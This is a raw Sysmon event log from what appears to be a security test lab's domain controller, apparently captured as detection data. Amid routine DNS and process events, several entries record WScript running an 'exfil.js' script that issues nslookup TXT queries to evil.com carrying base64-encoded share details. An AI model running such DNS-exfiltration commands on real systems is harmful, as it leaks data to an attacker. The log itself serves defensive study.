14:16:37.496{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C5-629A-1741-000000005F02}6036C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 354300x8000000000000000202022Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.745{00000000-0000-0000-0000-000000000000}5416<unknown process>-udptruefalse127.0.0.1-52867-false127.0.0.1-53domain 354300x8000000000000000202021Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.645{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52866- 354300x8000000000000000202020Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.645{00000000-0000-0000-0000-000000000000}6396<unknown process>-udptruefalse127.0.0.1-52866-false127.0.0.1-53domain 354300x8000000000000000202019Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.645{00000000-0000-0000-0000-000000000000}6396<unknown process>-udpfalsefalse127.0.0.1-52865-false127.0.0.1-53domain 354300x8000000000000000202018Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.645{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52865- 354300x8000000000000000202017Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.644{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52864- 354300x8000000000000000202016Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.644{00000000-0000-0000-0000-000000000000}6396<unknown process>-udptruefalse127.0.0.1-52864-false127.0.0.1-53domain 354300x8000000000000000202015Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.538{00000000-0000-0000-0000-000000000000}4860<unknown process>-udpfalsefalse127.0.0.1-52863-false127.0.0.1-53domain 354300x8000000000000000202014Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.538{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52863- 354300x8000000000000000202013Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.538{00000000-0000-0000-0000-000000000000}4860<unknown process>-udptruefalse127.0.0.1-52863-false127.0.0.1-53domain 354300x8000000000000000202012Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.538{00000000-0000-0000-0000-000000000000}4860<unknown process>-udpfalsefalse127.0.0.1-52862-false127.0.0.1-53domain 354300x8000000000000000202011Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.538{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52862- 354300x8000000000000000202010Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.538{00000000-0000-0000-0000-000000000000}4860<unknown process>-udptruefalse127.0.0.1-52862-false127.0.0.1-53domain 10341000x8000000000000000202009Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.480{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000202008Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.538{00000000-0000-0000-0000-000000000000}4860<unknown process>-udpfalsefalse127.0.0.1-52861-false127.0.0.1-53domain 10341000x8000000000000000202007Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.480{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000202006Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.537{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52861- 354300x8000000000000000202005Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.537{00000000-0000-0000-0000-000000000000}4860<unknown process>-udptruefalse127.0.0.1-52861-false127.0.0.1-53domain 10341000x8000000000000000202004Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.480{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C5-629A-1641-000000005F02}7648C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 354300x8000000000000000202003Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.417{00000000-0000-0000-0000-000000000000}5620<unknown process>-udpfalsefalse127.0.0.1-52860-false127.0.0.1-53domain 354300x8000000000000000202002Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.417{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52860- 10341000x8000000000000000202001Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.465{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000202000Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.417{00000000-0000-0000-0000-000000000000}5620<unknown process>-udptruefalse127.0.0.1-52860-false127.0.0.1-53domain 10341000x8000000000000000201999Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.465{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000201998Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.417{00000000-0000-0000-0000-000000000000}5620<unknown process>-udpfalsefalse127.0.0.1-52859-false127.0.0.1-53domain 10341000x8000000000000000201997Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.465{2E1864BB-17A1-629A-783D-000000005F02}55522692C:\Windows\System32\WScript.exe{2E1864BB-17C5-629A-1641-000000005F02}7648C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000201996Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.417{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52859- 354300x8000000000000000201995Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.417{00000000-0000-0000-0000-000000000000}5620<unknown process>-udptruefalse127.0.0.1-52859-false127.0.0.1-53domain 154100x8000000000000000201994Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.479{2E1864BB-17C5-629A-1641-000000005F02}7648C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlwxtvg.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 354300x8000000000000000201993Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.416{00000000-0000-0000-0000-000000000000}5620<unknown process>-udpfalsefalse127.0.0.1-52858-false127.0.0.1-53domain 354300x8000000000000000201992Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.415{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52858- 354300x8000000000000000201991Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.415{00000000-0000-0000-0000-000000000000}5620<unknown process>-udptruefalse127.0.0.1-52858-false127.0.0.1-53domain 354300x8000000000000000201990Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.311{00000000-0000-0000-0000-000000000000}5624<unknown process>-udpfalsefalse127.0.0.1-52857-false127.0.0.1-53domain 354300x8000000000000000201989Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.311{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52857- 354300x8000000000000000201988Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.311{00000000-0000-0000-0000-000000000000}5624<unknown process>-udptruefalse127.0.0.1-52857-false127.0.0.1-53domain 354300x8000000000000000201987Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.311{00000000-0000-0000-0000-000000000000}5624<unknown process>-udpfalsefalse127.0.0.1-52856-false127.0.0.1-53domain 354300x8000000000000000201986Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.311{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52856- 354300x8000000000000000201985Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.311{00000000-0000-0000-0000-000000000000}5624<unknown process>-udptruefalse127.0.0.1-52856-false127.0.0.1-53domain 354300x8000000000000000201984Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.310{00000000-0000-0000-0000-000000000000}5624<unknown process>-udpfalsefalse127.0.0.1-52855-false127.0.0.1-53domain 354300x8000000000000000201983Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.310{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52855- 354300x8000000000000000201982Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.310{00000000-0000-0000-0000-000000000000}5624<unknown process>-udptruefalse127.0.0.1-52855-false127.0.0.1-53domain 354300x8000000000000000201981Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.223{00000000-0000-0000-0000-000000000000}2068<unknown process>-udpfalsefalse127.0.0.1-52854-false127.0.0.1-53domain 354300x8000000000000000201980Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.223{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52854- 354300x8000000000000000201979Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.223{00000000-0000-0000-0000-000000000000}2068<unknown process>-udptruefalse127.0.0.1-52854-false127.0.0.1-53domain 23542300x8000000000000000201978Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.465{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlotrc.tmpMD5=761C32825E612E802625B3B432A8B214,SHA256=93B655C823F758E66012CC507AD76996E6991D3C8795548139308F047C0D31E1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000201977Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.042{00000000-0000-0000-0000-000000000000}7328<unknown process>-udpfalsefalse127.0.0.1-52853-false127.0.0.1-53domain 354300x8000000000000000201976Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.042{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52853- 354300x8000000000000000201975Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.041{00000000-0000-0000-0000-000000000000}7328<unknown process>-udptruefalse127.0.0.1-52853-false127.0.0.1-53domain 354300x8000000000000000201974Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.041{00000000-0000-0000-0000-000000000000}7328<unknown process>-udpfalsefalse127.0.0.1-52852-false127.0.0.1-53domain 354300x8000000000000000201973Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.039{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52852- 354300x8000000000000000201972Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.039{00000000-0000-0000-0000-000000000000}7328<unknown process>-udptruefalse127.0.0.1-52852-false127.0.0.1-53domain 354300x8000000000000000201971Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.039{00000000-0000-0000-0000-000000000000}7328<unknown process>-udpfalsefalse127.0.0.1-52851-false127.0.0.1-53domain 354300x8000000000000000201970Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.039{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52851- 354300x8000000000000000201969Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:35.038{00000000-0000-0000-0000-000000000000}7328<unknown process>-udptruefalse127.0.0.1-52851-false127.0.0.1-53domain 10341000x8000000000000000201968Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.433{2E1864BB-17C5-629A-1441-000000005F02}42965440C:\Windows\system32\conhost.exe{2E1864BB-17C5-629A-1541-000000005F02}7468C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201967Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.432{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201966Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.432{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201965Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.431{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201964Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.431{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000201963Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.430{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C5-629A-1541-000000005F02}7468C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000201962Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.430{2E1864BB-17C5-629A-1341-000000005F02}63245816C:\Windows\system32\cmd.exe{2E1864BB-17C5-629A-1541-000000005F02}7468C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000201961Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:37.430{2E1864BB-17C5-629A-1541-000000005F02}7468C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C5-629A-1341-000000005F02}6324C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlotrc.tmp 2>&1 10341000x8000000000000000201960Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 